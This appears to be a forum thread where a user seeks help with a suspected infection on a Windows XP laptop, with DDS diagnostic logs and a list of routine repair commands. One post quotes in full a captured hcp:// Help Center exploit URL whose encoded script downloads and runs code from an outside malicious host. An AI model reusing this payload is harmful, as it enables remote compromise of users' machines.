emu\online armor\oacat.exe [2009-10-15 1244360] R2 SvcOnlineArmor;Online Armor;c:\program files\tall emu\online armor\oasrv.exe [2009-10-15 3184328] R3 MBAMProtector;MBAMProtector;c:\windows\system32\drivers\mbam.sys [2010-10-14 22344] S3 AdobeFlashPlayerUpdateSvc;Adobe Flash Player Update Service;c:\windows\system32 \macromed\flash\FlashPlayerUpdateService.exe [2012-4-1 253600] . =============== Created Last 30 ================ . 2012-04-10 14:59:12 711240 ----a-w- c:\windows\isRS-000.tmp 2012-04-04 18:56:08 -------- d-----w- c:\documents and settings\uba\local settings\application data\Mozilla 2012-04-04 10:29:42 -------- d-----w- c:\program files\Microsoft Windows 7 Upgrade Advisor 2012-04-02 22:47:58 -------- d-----w- c:\program files\HitmanPro 2012-04-02 22:47:51 -------- d-----w- c:\documents and settings\all users\application data\HitmanPro 2012-04-02 18:21:06 -------- d-----w- c:\documents and settings\uba\local settings\application data\NPE 2012-04-02 18:21:06 -------- d-----w- c:\documents and settings\all users\application data\Norton 2012-04-01 16:11:55 70304 ----a-w- c:\windows\system32\FlashPlayerCPLApp.cpl 2012-04-01 16:11:55 418464 ----a-w- c:\windows\system32\FlashPlayerApp.exe . ==================== Find3M ==================== . 2012-04-04 14:56:40 22344 ----a-w- c:\windows\system32\drivers\mbam.sys 2012-03-31 10:13:21 66616 ----a-w- c:\windows\system32\drivers\avgntflt.sys . ============= FINISH: 20:10:51.20 =============== _________________________________________________________________________________________________________________________________________ Since running DDS in my first post, I have installed Firefox (which I normally use on another PC), installed Windows 7 Upgrade Adviser (just to see what kind of result it would give me, even though I wasn't planning to install W7 on this PC (and the Adviser always crashes), and also installed Hitman Pro, just to test it. Additionally I also switched on my external HDD as the bulk of my data is on there. I don't know if the latter makes any difference to DDS' results though. I have not installed any Windows Updates for XP since last year as I didn't want to alter the OS too much if the PC is infected. Likewise, I haven't updated Java for the same reasons. Please could you view my first post for details on why those are out of date, if that is ok. I never used Firefox on this PC in the past and only used Internet Explorer. IE runs terribly slow and temporarily freezes frequently when visiting sites. That may be down to poor hardware specs though as Firefox does likewise (although vastly less often). In fact, the PC behaves slowly and freezes sometimes even when no browsers are being used. MBAM takes a long time to update and spends most of its time saying it is connecting to the server (in contrast, my netbook PC connects to the MBAM servers instantly but is more modern (if not all that powerful), runs Windows 7 and has different anti-virus and firewall software). This PC never shuts down properly either and I have to press the power switch to complete the Shutting Down process. This occurred the same day as I started seeing the strange download requests. I thought the download prompts were exclusive to Internet Explorer (I thought it was an IE window appearing) but installing Firefox told me otherwise. Those prompts appear in FF also. They all seem to be related to sites that use Java. As well as the sites mentioned in my first post, I recently tried Runescape.com and the British Telecom speed test site. Whenever I visit sites such as these, I get the window asking me to download something, with the publisher always being listed as Microsoft Corporation. This is highly suspect seeing as those sites won't have anything to do with MS. Also, there is always a problem with the signature verification, saying that it has expired or is invalid. I always cancel the request to download. The site's application will then display and run as normal. If not, then another prompt appears with the publisher being far more likely (e.g. Jagex for Runescape). The digital signature is also verified. Before I recently removed it, I visited an old bookmark (while using IE) that I had added a few years ago. Not remembering what it was, I visited it. I know for sure it wasn't a bad site (pirated software, pornography, etc.). I got redirected to one of those old screens saying Congratulations, you're our 1000th visitor of the day. Click here to go claim your prize. I haven't seen those damn things in ages. Annoyingly I couldn't close it and it wasn't a popup. I couldn't even close IE normally and everytime I tried to close it with Task Manager, the End Program window kept disappearing everytime I tried to get my mouse pointer near it. Another site had been replaced with a screen full of banner ads. This one was more alarming as Avira's Web Guard said it blocked TR/ Ramnit. E. At the same time, I saw a prompt appear saying the following: Do you want to allow this website to open a program on your computer? From: de.exoticbeijing.com Program: Microsoft Help and Support Center Address: hcp://services/search?query=anything&topic=hcp://system/sysinfo/sysinfomain.htm%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A..%5C..%5Csysinfomain.htm?svr=<script defer>eval(Run(String.fromCharCode(99,109,100,32,47,99,32,101,99,104,111,32,66,61,34,108,46,118,98,115,34,58,87,105,116,104,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,77,83,88,77,76,50,46,88,77,76,72,84,84,80,34,41,58,46,111,112,101,110,32,34,71,69,84,34,44,34,104,116,116,112,58,47,47,100,101,46,101,120,111,116,105,99,98,101,105,106,105,110,103,46,99,111,109,47,100,97,116,97,47,104,99,112,95,118,98,115,46,112,104,112,63,102,61,57,55,100,49,57,38,100,61,48,34,44,102,97,108,115,101,58,46,115,101,110,100,40,41,58,83,101,116,32,65,32,61,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,83,99,114,105,112,116,105,110,103,46,70,105,108,101,83,121,115,116,101,109,79,98,106,101,99,116,34,41,58,83,101,116,32,68,61,65,46,67,114,101,97,116,101,84,101,120,116,70,105,108,101,40,65,46,71,101,116,83,112,101,99,105,97,108,70,111,108,100,101,114,40,50,41,32,43,32,34,92,34,32,43,32,66,41,58,68,46,87,114,105,116,101,76,105,110,101,32,46,114,101,115,112,111,110,115,101,84,101,120,116,58,69,110,100,32,87,105,116,104,58,68,46,67,108,111,115,101,58,67,114,101,97,116,101,79,98,106,101,99,116,40,34,87,83,99,114,105,112,116,46,83,104,101,108,108,34,41,46,82,117,110,32,65,46,71,101,116,83,112,101,99,105,97,108,70,111,108,100,101,114,40,50,41,32,43,32,34,92,34,32,43,32,66,32,62,32,37,84,69,77,80,37,92,92,108,46,118,98,115,32,38,38,32,37,84,69,77,80,37,92,92,108,46,118,98,115,32,38,38,32,116,97,115,107,107,105,108,108,32,47,70,32,47,73,77,32,104,101,108,112,99,116,114,46,101,120,101)));</script> I cancelled it and haven't seen anything like that since. I don't know if that was just something lying in wait at the now dodgy website or is related to the problems I have been seeing. Seeing Microsoft appear once again made me wonder. Also, there was the fact that Avira listed Ramnit and one site I noted visiting, shortly before my accident last year when I last used this PC, asked if I wanted to download something called cpak.Crimepack (with the same Java related prompt). I once read about that and Ramnit got mentioned at the same time. I have since removed lots of bookmarks, if they are not ones that I remember or recognise. I'm sure I added them myself, as opposed to them being rogue but they were more than likely added years ago. I had a habit of adding bookmarks to look at later and then not deleting them. Once again, sorry for the lengthy post. As always, I wanted to give as much detail as possible. Kind regards, Paul

Hello, I am experiencing some odd behaviour with my laptop PC. It is an old PC with Windows XP and Internet Explorer 8. I have Avira Premium and MBAM. To give some background, this is something that actually occurred in January 2011 that I never got round to resolving. A few days after experiencing this problem, and before being able to report it on this site, I suffered a near fatal accident that took me a long time to recover from (I still haven't fully recovered, even a year later and may never will). Even when my health was starting to improve, months later after returning home, looking into fixing the PC was the last thing I was interested in. Therefore it sat unused until just recently, when I decided I needed to finally get it sorted. To describe the problems I have been experiencing, it happened while visiting a website. Which one it was I have no idea (and I can't truly remember what I was doing last year before my accident). I do remember visiting an apparently innocuous forum after which I was seeing strange happenings but that might be unrelated. Fortunately, I happened to make notes before my accident so I could detail the symptoms on this forum. I have also done a little internet browsing today before posting and seen that nothing has changed a year later. My laptop has Internet Explorer 8 and upon visiting certain websites, usually or maybe only ones involving Java, I would see a download prompt appear asking whether I wanted to download a particular file. The file would vary but the source would always be apparently from Microsoft, regardless of the site I am visiting. If I declined the download (which I always did), everything would behave normally anyway. For instance, if I visit thinkbroadband.com and click on Speed Test (on the lower left of the page), I will go to their test page and see the circular Java logo appear as it loads in. I will then see the standard IE8 download prompt appear saying: NAME: SpeedTester201 PUBLISHER: Microsoft Corporation FROM: file:// If I click Cancel, it all loads anyway. The prompt always reports that the application's digital signature has an error. Visiting pingtest.net brings up the same prompt and the same digitial signature error, except that the Name is now VoipApplet, instead of SpeedTester201 (but still apparently from Microsoft). Those are two sites that I can visit right now to see the prompt but I saw that I had written in my notes last year some other requests that came up. Unfortunately, I didn't note the sites I visited. These were: NAME: goog.main PUBLISHER: Microsoft Corporation FROM: file:// and NAME: cpak.Crimepack PUBLISHER: Microsoft Corporation FROM: file:// The day that all this started happening, I also experienced other problems. I tried to do a System Restore but it always failed. I can't remember what caused it but the Restore Points then got wiped. I also saw a BSOD error with a report saying: Page_Fault_in_non_paged_area STOP 0X00000050 (0XF7F45000, 0X0000001, 0X804D9A69, 0X0000000) I haven't experienced any other BSOD errors so far but there is the other problem where Windows XP no longer shuts down successfully. I get the blue Shutting Down screen but almost always have to press the power button to switch off the PC (except in very rare cases). Basically, 9 times out of 10, I will have to press the power button. Restarting the PC is equally impossible. I did a file search recently to see if any files had been modified after booting up again a year later and noticed today that several image files (that I haven't viewed or gone anywhere near since last year) have dates that show the years 2019, 2038 and 2101. File creation dates are normal. This may or may not be down to the fact the time and date were incorrect until yesterday when I synchronised it with the internet time. Download speeds might be affected as they report far lower speeds than another PC I have access to. The other PC is a modern netbook with Windows 7 and on that I see speeds saying over 7Mb. On this laptop with Windows XP I don't see speeds faster than 4Mb. That might be down to the older technology though as opposed to any malware (to give an uneducated guess). I have run full scans with Avira, MBAM, Kaspersky's TDSS Killer and Norton Power Eraser and so far no detections have been found. TDSS Killer found several files with unrecognised digital signatures but nothing else. I have left them untouched for now. I have so far not tried scanning with any other software. I ran netstat from the command prompt and that shows lots of connections, all in the Time_Wait state. Those connections are shown even when no browser is open. Other than Avira, MBAM and the Online Armor firewall, I can't think of what else might be running. Most software I have set to connect to the net only when I want them to. Other than the symptoms I have listed, there does not seem to be any other strange behaviour with the PC. I have copied and pasted results from the DDS software. If you see any out of date software, that is because I haven't updated anything in all this time, other than Avira and MBAM, as I have only just switched the PC back on a day before. I also did not want to perform any Windows Updates or Java updates that may hinder detecting or destroying any malware. ____________________________________________________________________ DDS.txt ____________________________________________________________________ . DDS (Ver_2011-08-26.01) - NTFSx86 Internet Explorer: 8.0.6001.18702 Run by UBA at 19:36:30 on 2012-04-02 Microsoft Windows XP Home Edition 5.1.2600.3.1252.44.1033.18.1007.434 [GMT 1:00] . AV: AntiVir Desktop *Enabled/Updated* {C19476D9-52BC-4E93-8AF3-CCF59F7AE8FE} FW: Online Armor Firewall *Enabled* . ============== Running Processes =============== . C:\WINDOWS\system32\svchost -k DcomLaunch svchost.exe C:\WINDOWS\System32\svchost.exe -k netsvcs svchost.exe svchost.exe C:\WINDOWS\Explorer.EXE C:\Program Files\Tall Emu\Online Armor\OAcat.exe C:\Program Files\Tall Emu\Online Armor\oasrv.exe C:\WINDOWS\system32\spoolsv.exe C:\Program Files\Avira\AntiVir Desktop\sched.exe svchost.exe C:\Program Files\Avira\AntiVir Desktop\avguard.exe C:\Program Files\TOSHIBA\ConfigFree\CFSvcs.exe C:\WINDOWS\System32\svchost.exe -k HTTPFilter C:\Program Files\Malwarebytes' Anti-Malware\mbamservice.exe C:\Program Files\Avira\AntiVir Desktop\avshadow.exe C:\Program Files\Analog Devices\SoundMAX\SMAgent.exe C:\Program Files\Avira\AntiVir Desktop\avmailc.exe C:\Program Files\Avira\AntiVir Desktop\AVWEBGRD.EXE C:\WINDOWS\System32\hkcmd.exe C:\WINDOWS\System32\00THotkey.exe C:\WINDOWS\LTSMMSG.exe C:\Program Files\Apoint2K\Apoint.exe C:\Program Files\TOSHIBA\TouchED\TouchED.Exe C:\Program Files\TOSHIBA\PadTouch\PadExe.exe C:\WINDOWS\system32\TFNF5.exe C:\WINDOWS\system32\TPSMain.exe C:\Program Files\TOSHIBA\TOSHIBA Controls\TFncKy.exe C:\Program Files\Tall Emu\Online Armor\oaui.exe C:\WINDOWS\system32\TPSBattM.exe C:\Program Files\Apoint2K\Apntex.exe C:\Program Files\Avira\AntiVir Desktop\avgnt.exe C:\Program Files\Tall Emu\Online Armor\OAhlp.exe C:\Program Files\Malwarebytes' Anti-Malware\mbamgui.exe C:\Program Files\Windows Media Player\WMPNSCFG.exe C:\Program Files\GetRight\GetRight.exe C:\Program Files\Logitech\SetPoint\SetPoint.exe C:\Program Files\Common Files\Logishrd\KHAL2\KHALMNPR.EXE . ============== Pseudo HJT Report =============== . uStart Page = hxxp://home.live.com/ BHO: Adobe PDF Link Helper: {18df081c-e8ad-4283-a596-fa578c2ebdc3} - c:\program files\common files\adobe\acrobat\activex\AcroIEHelperShim.dll BHO: IE to GetRight Helper: {31ff080d-12a3-439a-a2ef-4ba95a3148e8} - c:\program files\getright\xx2gr.dll BHO: Java Plug-In 2 SSV Helper: {dbc80044-a445-435b-bc74-9c25c1c588a9} - c:\program files\java\jre6\bin\jp2ssv.dll EB: {32683183-48a0-441b-a342-7c2a440a9478} - No File uRun: [WMPNSCFG] c:\program files\windows media player\WMPNSCFG.exe uRunOnce: [shockwave Updater] c:\windows\system32\adobe\shockwave 11\SwHelper_1151601.exe -Update -1151601 -"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" -"http://www.adobe.com/shockwave/welcome/" mRun: [igfxTray] c:\windows\system32\igfxtray.exe mRun: [HotKeysCmds] c:\windows\system32\hkcmd.exe mRun: [00THotkey] c:\windows\system32\00THotkey.exe mRun: [000StTHK] 000StTHK.exe mRun: [LTSMMSG] LTSMMSG.exe mRun: [Apoint] c:\program files\apoint2k\Apoint.exe mRun: [TouchED] c:\program files\toshiba\touched\TouchED.Exe mRun: [PadTouch] "c:\program files\toshiba\padtouch\PadExe.exe mRun: [TFNF5] TFNF5.exe mRun: [TPSMain] TPSMain.exe mRun: [TFncKy] TFncKy.exe mRun: [@OnlineArmor GUI] "c:\program files\tall emu\online armor\oaui.exe" mRun: [Kernel and Hardware Abstraction Layer] KHALMNPR.EXE mRun: [Adobe Reader Speed Launcher] "c:\program files\adobe\reader 9.0\reader\Reader_sl.exe" mRun: [Adobe ARM] "c:\program files\common files\adobe\arm\1.0\AdobeARM.exe" mRun: [sunJavaUpdateSched] "c:\program files\common files\java\java update\jusched.exe" mRun: [avgnt] "c:\program files\avira\antivir desktop\avgnt.exe" /min mRun: [Malwarebytes' Anti-Malware] "c:\program files\malwarebytes' anti-malware\mbamgui.exe" /starttray StartupFolder: c:\docume~1\alluse~1\startm~1\programs\startup\getright.lnk - c:\program files\getright\GetRight.exe StartupFolder: c:\docume~1\alluse~1\startm~1\programs\startup\logite~1.lnk - c:\program files\logitech\setpoint\SetPoint.exe IE: Download with GetRight - c:\program files\getright\GRdownload.htm IE: Open with GetRight Browser - c:\program files\getright\GRbrowse.htm IE: {e2e2dd38-d088-4134-82b7-f2ba38496583} - %windir%\Network Diagnostic\xpnetdiag.exe IE: {FB5F1910-F110-11d2-BB9E-00C04F795683} - c:\program files\messenger\msmsgs.exe LSP: c:\program files\avira\antivir desktop\avsda.dll DPF: {166B1BCA-3F9C-11CF-8075-444553540000} - hxxp://download.macromedia.com/pub/shockwave/cabs/director/sw.cab DPF: {233C1507-6A77-46A4-9443-F871F945D258} - hxxp://download.macromedia.com/pub/shockwave/cabs/director/sw.cab DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} - hxxp://www.update.microsoft.com/windowsupdate/v6/V5Controls/en/x86/client/wuweb_site.cab?1264487526468 DPF: {7530BFB8-7293-4D34-9923-61A11451AFC5} - hxxp://download.eset.com/special/eos/OnlineScanner.cab DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_20-windows-i586.cab DPF: {CAFEEFAC-0016-0000-0020-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_20-windows-i586.cab DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_20-windows-i586.cab DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} - hxxp://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab TCP: DhcpNameServer = 192.168.1.254 TCP: Interfaces\{1C7A2F47-0733-4991-854B-E312D1FE6FE7} : DhcpNameServer = 192.168.1.254 Notify: igfxcui - igfxsrvc.dll Notify: LBTWlgn - c:\program files\common files\logishrd\bluetooth\LBTWlgn.dll SSODL: WPDShServiceObj - {AAA288BA-9A4C-45B0-95D7-94D524869DB5} - c:\windows\system32\WPDShServiceObj.dll SEH: OA Shell Helper: {4f07da45-8170-4859-9b5f-037ef2970034} - c:\progra~1\tallem~1\online~1\oaevent.dll Hosts: 127.0.0.1 www.spywareinfo.com . ============= SERVICES / DRIVERS =============== . R0 SMR250;Symantec SMR Utility Service 2.5.0;c:\windows\system32\drivers\SMR250.SYS [2012-4-2 83064] R1 avgio;avgio;c:\program files\avira\antivir desktop\avgio.sys [2010-12-15 11608] R1 OADevice;OADriver;c:\windows\system32\drivers\OADriver.sys [2009-10-15 200784] R1 OAmon;OAmon;c:\windows\system32\drivers\OAmon.sys [2009-10-15 24656] R1 OAnet;OAnet;c:\windows\system32\drivers\OAnet.sys [2009-10-15 29776] R2 AntiVirMailService;Avira AntiVir MailGuard;c:\program files\avira\antivir desktop\avmailc.exe [2010-12-15 340136] R2 AntiVirSchedulerService;Avira AntiVir Scheduler;c:\program files\avira\antivir desktop\sched.exe [2010-12-15 136360] R2 AntiVirService;Avira AntiVir Guard;c:\program files\avira\antivir desktop\avguard.exe [2010-12-15 269480] R2 AntiVirWebService;Avira AntiVir WebGuard;c:\program files\avira\antivir desktop\avwebgrd.exe [2010-12-15 428200] R2 avgntflt;avgntflt;c:\windows\system32\drivers\avgntflt.sys [2010-12-15 66616] R2 MBAMService;MBAMService;c:\program files\malwarebytes' anti-malware\mbamservice.exe [2010-10-14 652360] R2 OAcat;Online Armor Helper Service;c:\program files\tall emu\online armor\oacat.exe [2009-10-15 1244360] R2 SvcOnlineArmor;Online Armor;c:\program files\tall emu\online armor\oasrv.exe [2009-10-15 3184328] R3 MBAMProtector;MBAMProtector;c:\windows\system32\drivers\mbam.sys [2010-10-14 20464] S3 AdobeFlashPlayerUpdateSvc;Adobe Flash Player Update Service;c:\windows\system32 \macromed\flash\FlashPlayerUpdateService.exe [2012-4-1 253600] . =============== Created Last 30 ================ . 2012-04-02 18:21:15 83064 ----a-w- c:\windows\system32\drivers\SMR250.SYS 2012-04-02 18:21:06 -------- d-----w- c:\documents and settings\uba\local settings\application data\NPE 2012-04-02 18:21:06 -------- d-----w- c:\documents and settings\all users\application data\Norton 2012-04-01 16:11:55 70304 ----a-w- c:\windows\system32\FlashPlayerCPLApp.cpl 2012-04-01 16:11:55 418464 ----a-w- c:\windows\system32\FlashPlayerApp.exe . ==================== Find3M ==================== . 2012-03-31 10:13:21 66616 ----a-w- c:\windows\system32\drivers\avgntflt.sys . ============= FINISH: 19:39:48.00 =============== ____________________________________________________________________ Attach.txt ____________________________________________________________________ . UNLESS SPECIFICALLY INSTRUCTED, DO NOT POST THIS LOG. IF REQUESTED, ZIP IT UP & ATTACH IT . DDS (Ver_2011-08-26.01) . Microsoft Windows XP Home Edition Boot Device: \Device\HarddiskVolume1 Install Date: 14/10/2009 03:36:39 System Uptime: 02/04/2012 19:24:58 (0 hours ago) . Motherboard: TOSHIBA | | Portable PC Processor: Intel® Celeron® CPU 2.70GHz | uFC-PGA Socket | 2693/100mhz . ==== Disk Partitions ========================= . C: is FIXED (NTFS) - 28 GiB total, 4.703 GiB free. D: is CDROM () E: is FIXED (NTFS) - 466 GiB total, 137.642 GiB free. . ==== Disabled Device Manager Items ============= . ==== System Restore Points =================== . RP275: 16/12/2011 04:11:38 - Restore Operation RP276: 10/02/2012 09:17:09 - System Checkpoint RP277: 09/03/2012 07:39:47 - System Checkpoint RP278: 01/04/2012 16:39:40 - Removed Simple Adblock RP279: 02/04/2012 18:24:20 - System Checkpoint . ==== Installed Programs ====================== . AAC Decoder ACDSee 5.0 PowerPack Adobe Flash Player 11 ActiveX Adobe Reader 9.3.2 Alps Pointing-device Driver AutoUpdate Avira AntiVir Premium Bulk Image Downloader v4.7.0.1 CCleaner (remove only) CD/DVD Drive Acoustic Silencer CDDRV_Installer Debugging Tools for Windows (x86) DivX Codec DivX Plus DirectShow Filters DivX Plus Web Player DivX Version Checker erLT FLAC 1.2.1b (remove only) GetRight H.264 Decoder HiJackThis Hotfix for Microsoft .NET Framework 3.5 SP1 (KB953595) Hotfix for Microsoft .NET Framework 3.5 SP1 (KB958484) Hotfix for Windows Media Format 11 SDK (KB929399) Hotfix for Windows Media Player 11 (KB939683) Hotfix for Windows XP (KB2443685) Hotfix for Windows XP (KB952287) Hotfix for Windows XP (KB954550-v5) Hotfix for Windows XP (KB961118) Hotfix for Windows XP (KB970653-v3) Hotfix for Windows XP (KB976002-v5) Hotfix for Windows XP (KB976098-v2) Hotfix for Windows XP (KB979306) Hotfix for Windows XP (KB981793) Intel® Extreme Graphics Driver Intel® PRO Network Adapters and Drivers Java Auto Updater Java 6 Update 20 K-Lite Mega Codec Pack 6.4.0 KhalInstallWrapper Logitech SetPoint Malwarebytes Anti-Malware version 1.60.1.1000 Microsoft .NET Framework 1.1 Microsoft .NET Framework 1.1 Security Update (KB2416447) Microsoft .NET Framework 1.1 Security Update (KB979906) Microsoft .NET Framework 2.0 Service Pack 2 Microsoft .NET Framework 3.0 Service Pack 2 Microsoft .NET Framework 3.5 SP1 Microsoft Compression Client Pack 1.0 for Windows XP Microsoft Kernel-Mode Driver Framework Feature Pack 1.5 Microsoft User-Mode Driver Framework Feature Pack 1.0 Microsoft Visual C++ 2005 Redistributable Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 Microsoft XNA Framework Redistributable 3.1 MKV Splitter Monkey's Audio Online Armor 3.5 Real Alternative 2.0.2 Security Update for Microsoft .NET Framework 3.5 SP1 (KB2416473) Security Update for Step By Step Interactive Training (KB923723) Security Update for Windows Internet Explorer 8 (KB2183461) Security Update for Windows Internet Explorer 8 (KB2416400) Security Update for Windows Internet Explorer 8 (KB971961) Security Update for Windows Internet Explorer 8 (KB974455) Security Update for Windows Internet Explorer 8 (KB978207) Security Update for Windows Internet Explorer 8 (KB981332) Security Update for Windows Internet Explorer 8 (KB982381) Security Update for Windows Media Player (KB2378111) Security Update for Windows Media Player (KB952069) Security Update for Windows Media Player (KB954155) Security Update for Windows Media Player (KB968816) Security Update for Windows Media Player (KB973540) Security Update for Windows Media Player (KB975558) Security Update for Windows Media Player (KB978695) Security Update for Windows Media Player 11 (KB954154) Security Update for Windows XP (KB2079403) Security Update for Windows XP (KB2115168) Security Update for Windows XP (KB2121546) Security Update for Windows XP (KB2160329) Security Update for Windows XP (KB2229593) Security Update for Windows XP (KB2259922) Security Update for Windows XP (KB2286198) Security Update for Windows XP (KB2296011) Security Update for Windows XP (KB2296199) Security Update for Windows XP (KB2347290) Security Update for Windows XP (KB2360937) Security Update for Windows XP (KB2387149) Security Update for Windows XP (KB2423089) Security Update for Windows XP (KB2436673) Security Update for Windows XP (KB2440591) Security Update for Windows XP (KB2443105) Security Update for Windows XP (KB923561) Security Update for Windows XP (KB923789) Security Update for Windows XP (KB941569) Security Update for Windows XP (KB946648) Security Update for Windows XP (KB950762) Security Update for Windows XP (KB950974) Security Update for Windows XP (KB951066) Security Update for Windows XP (KB951376-v2) Security Update for Windows XP (KB951748) Security Update for Windows XP (KB952004) Security Update for Windows XP (KB952954) Security Update for Windows XP (KB954459) Security Update for Windows XP (KB955069) Security Update for Windows XP (KB956572) Security Update for Windows XP (KB956744) Security Update for Windows XP (KB956802) Security Update for Windows XP (KB956803) Security Update for Windows XP (KB956844) Security Update for Windows XP (KB957097) Security Update for Windows XP (KB958644) Security Update for Windows XP (KB958687) Security Update for Windows XP (KB958869) Security Update for Windows XP (KB959426) Security Update for Windows XP (KB960225) Security Update for Windows XP (KB960803) Security Update for Windows XP (KB960859) Security Update for Windows XP (KB961371-v2) Security Update for Windows XP (KB961501) Security Update for Windows XP (KB968537) Security Update for Windows XP (KB969059) Security Update for Windows XP (KB969947) Security Update for Windows XP (KB970238) Security Update for Windows XP (KB970430) Security Update for Windows XP (KB971468) Security Update for Windows XP (KB971486) Security Update for Windows XP (KB971557) Security Update for Windows XP (KB971633) Security Update for Windows XP (KB971657) Security Update for Windows XP (KB971961) Security Update for Windows XP (KB972270) Security Update for Windows XP (KB973354) Security Update for Windows XP (KB973507) Security Update for Windows XP (KB973525) Security Update for Windows XP (KB973869) Security Update for Windows XP (KB973904) Security Update for Windows XP (KB974112) Security Update for Windows XP (KB974318) Security Update for Windows XP (KB974392) Security Update for Windows XP (KB974455) Security Update for Windows XP (KB974571) Security Update for Windows XP (KB975025) Security Update for Windows XP (KB975467) Security Update for Windows XP (KB975560) Security Update for Windows XP (KB975561) Security Update for Windows XP (KB975562) Security Update for Windows XP (KB975713) Security Update for Windows XP (KB977165-v2) Security Update for Windows XP (KB977816) Security Update for Windows XP (KB977914) Security Update for Windows XP (KB978037) Security Update for Windows XP (KB978251) Security Update for Windows XP (KB978262) Security Update for Windows XP (KB978338) Security Update for Windows XP (KB978542) Security Update for Windows XP (KB978601) Security Update for Windows XP (KB979309) Security Update for Windows XP (KB979482) Security Update for Windows XP (KB979559) Security Update for Windows XP (KB979683) Security Update for Windows XP (KB979687) Security Update for Windows XP (KB980195) Security Update for Windows XP (KB980218) Security Update for Windows XP (KB980232) Security Update for Windows XP (KB980436) Security Update for Windows XP (KB981322) Security Update for Windows XP (KB981852) Security Update for Windows XP (KB981997) Security Update for Windows XP (KB982132) Security Update for Windows XP (KB982214) Security Update for Windows XP (KB982665) Security Update for Windows XP (KB982802) Smugglers 4 Online Demo 1.1h SoundMAX SpywareBlaster 4.4 Swiff Player 1.5 TOSHIBA ConfigFree TOSHIBA Console TOSHIBA Controls TOSHIBA Hotkey Utility for Display Devices TOSHIBA Manuals TOSHIBA PC Diagnostic Tool TOSHIBA Power Saver TOSHIBA SD Memory Card Format TOSHIBA Software Modem TOSHIBA TouchPad On/Off Utility V2.05.00 TOSHIBA Utilities Touch and Launch Tweak UI Update for Microsoft .NET Framework 3.5 SP1 (KB963707) Update for Windows Internet Explorer 8 (KB973874) Update for Windows Internet Explorer 8 (KB976662) Update for Windows Internet Explorer 8 (KB976749) Update for Windows Internet Explorer 8 (KB980182) Update for Windows XP (KB2141007) Update for Windows XP (KB2345886) Update for Windows XP (KB2467659) Update for Windows XP (KB951978) Update for Windows XP (KB955759) Update for Windows XP (KB967715) Update for Windows XP (KB968389) Update for Windows XP (KB971737) Update for Windows XP (KB973687) Update for Windows XP (KB973815) VC80CRTRedist - 8.0.50727.4053 VLC media player 1.0.2 WebFldrs XP Winamp Windows Genuine Advantage Validation Tool (KB892130) Windows Internet Explorer 8 Windows Media Format 11 runtime Windows Media Player 11 Windows XP Service Pack 3 WinPatrol 2009 WinRAR archiver . ==== Event Viewer Messages From Past Week ======== . 31/03/2012 12:35:37, error: W32Time [34] - The time service has detected that the system time needs to be changed by +96601 seconds. The time service will not change the system time by more than +54000 seconds. Verify that your time and time zone are correct, and that the time source time.windows.com (ntp.m|0x1|192.168.1.65:123->65.55.21.15:123) is working properly. 31/03/2012 11:08:20, error: Service Control Manager [7000] - The tossmbnt service failed to start due to the following error: The system cannot find the file specified. 31/03/2012 10:54:44, error: W32Time [34] - The time service has detected that the system time needs to be changed by +96600 seconds. The time service will not change the system time by more than +54000 seconds. Verify that your time and time zone are correct, and that the time source time.windows.com (ntp.m|0x1|192.168.1.65:123->65.55.21.19:123) is working properly. 02/04/2012 19:26:37, error: Service Control Manager [7026] - The following boot-start or system-start driver(s) failed to load: IntelIde 01/04/2012 16:09:50, error: Service Control Manager [7023] - The Application Management service terminated with the following error: The specified module could not be found. . ==== End Of File =========================== ____________________________________________________________________ I apologise for the length of this post but I wanted to give as much detail as I could. I also wanted to give some detail as to why I had to leave it so long to address the problems I have been experiencing on this PC. Thank you in advance for your help. Kind regards, Paul (Solaris Wave)

ComboFix has been successfully uninstalled I believe. I did actually get worried at first that it was going to start scanning and cleaning again. Even though I used the /u switch, it was telling me it was about to run and to disable my anti-virus. I didn't disable AVG and instead of clicking the OK button on ComboFix's windows I was trying to close them. It ran anyway without my attempts to close the windows the normal way and appeared to uninstall, despite not switching off AVG or pressing OK. Is there anything else I need to do at this point? Is it worth running any of the other commands that you posted for my other thread, due to the infection behaving in a similar fashion, such as the following: CMD /C ECHO Y|CHKDSK C: /F | SHUTDOWN /R /T 30 CMD /C NETSH FIREWALL RESET CMD /C NETSH int ip reset c:\resetlog.txt CMD /C IPCONFIG /flushdns CMD /C arp -d * CMD /C netstat -a >C:\connections.txt CMD /C fsutil fsinfo statistics c: >c:\drivestats.txt As for the firewall, I'll most likely give ZoneAlarm Pro a miss. I'll use Online Armour Free for now but looking at the extra functions provided by the paid version makes me think I should at least buy a firewall to get added protection. ZoneAlarm did get good reviews but if you say it has become bloated then I doubt it will be much more pleasant to use than Norton's offering, which caused my PC to sweat. As you say though, there is only so much they can do. The main virus that got onto my system from the website dropped right in, past AVG's nose and then deliberately switched off XP's firewall. I wouldn't be surprised if it could do that with Norton, McAfee and ZoneAlarm. Regards.

